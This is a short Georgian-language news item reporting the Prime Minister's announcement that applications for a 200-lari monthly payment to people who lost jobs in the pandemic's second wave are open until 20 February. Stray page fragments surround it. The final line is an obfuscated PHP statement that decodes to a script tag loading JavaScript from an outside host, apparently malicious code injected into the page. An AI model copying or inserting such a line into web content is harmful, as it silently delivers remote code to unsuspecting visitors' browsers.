celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრის განცხადებით, 200 ლარიანი დახმარებების მიღების შესახებ განაცხადების მიღება დაწყებულია და ის 20 თებერვლამდე გაგრძელდება. ამის შესახებ გიორგი გახარიამ მთავრობის სხდომის დაწყებამდე განაცხადა.
 
მისი თქმით, დღეისათვის სამსახურის დაკარგვის გამო 200 ლარიანი დახმარების მიღებაზე განაცხადი 45 000 მოქალაქემ გააკეთა.
 
„ვაგრძელებთ ჩვენი მოქალაქეების მიზნობრივ სოციალურ დახმარებას. დაიწყო განაცხადების მიღება მოქალაქეებისგან, რომლებმაც ეპიდემიის მეორე ტალღის შედეგად დაკარგეს სამსახური. განაცხადების მიღება გაგრძელდება 20 თებერვლამდე, ხოლო 28 თებერვლიდან დაიწყება შესაბამისი ფინანსური დახმარების გაცემა. ეს გახლავთ 1 200 ლარი 6 თვის განმავლობაში“, - განაცხადა გიორგი გახარიამ და მოქალაქეებს განაცხადების დროული შევსებისკენ მოუწოდა.
1782
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");